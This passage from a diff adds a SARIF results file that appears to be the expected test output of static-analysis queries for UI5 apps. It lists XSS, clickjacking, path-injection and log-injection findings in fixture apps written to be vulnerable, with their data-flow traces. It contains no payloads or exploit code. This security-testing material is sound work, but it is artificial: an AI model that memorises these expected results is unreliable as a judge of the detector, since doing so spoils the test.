"index" : 348 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "97b29ed20ac04ff0:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + }, + "region" : { + "startLine" : 8, + "startColumn" : 40, + "endColumn" : 63 + } + }, + "message" : { + "text" : "\"contro ... l.json\"" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 34 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "5edd24be658b61a4:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 5, + "startColumn" : 11, + "endColumn" : 32 + } + }, + "message" : { + "text" : "data-value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 34 + } + }, + "message" : { + "text" : "data-content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 5, + "startColumn" : 11, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6e0d8f690e30e24a:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endLine" : 10, + "endColumn" : 27 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 15, + "startColumn" : 5, + "endLine" : 18, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endLine" : 10, + "endColumn" : 27 + } + }, + "message" : { + "text" : "user-provided value" + } + }, { + "id" : 2, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 15, + "startColumn" : 5, + "endLine" : 18, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + }, + "region" : { + "startLine" : 9, + "startColumn" : 9, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6152b8f74a1abdf5:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + }, + "region" : { + "startLine" : 28, + "startColumn" : 34, + "endColumn" : 66 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b01bd23ca3666824:1", + "primaryLocationStartColumnFingerprint" : "25" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to missing frame options." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + }, + "region" : { + "startLine" : 2, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7fe81114896a63c:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to missing frame options." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + }, + "region" : { + "startLine" : 2, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "df700c15dad274b2:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 17, + "startColumn" : 43, + "endColumn" : 61 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "68e5ff83e2198ff5:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 17, + "startColumn" : 43, + "endColumn" : 61 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 23, + "startColumn" : 43, + "endColumn" : 55 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b79de9dff4d8f842:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 9, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 58 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 46, + "endColumn" : 59 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 36, + "endColumn" : 60 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 21, + "endColumn" : 60 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 23, + "startColumn" : 43, + "endColumn" : 55 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 16, + "startColumn" : 39, + "endColumn" : 67 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "de27f6d546a116e8:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 16, + "startColumn" : 39, + "endColumn" : 67 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 8, + "startColumn" : 26, + "endColumn" : 31 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "62d5a4db56a18502:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 8, + "startColumn" : 26, + "endColumn" : 31 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 16, + "startColumn" : 26, + "endColumn" : 31 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "751ece7cb6fd18f7:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... , true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 16, + "startColumn" : 26, + "endColumn" : 31 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a 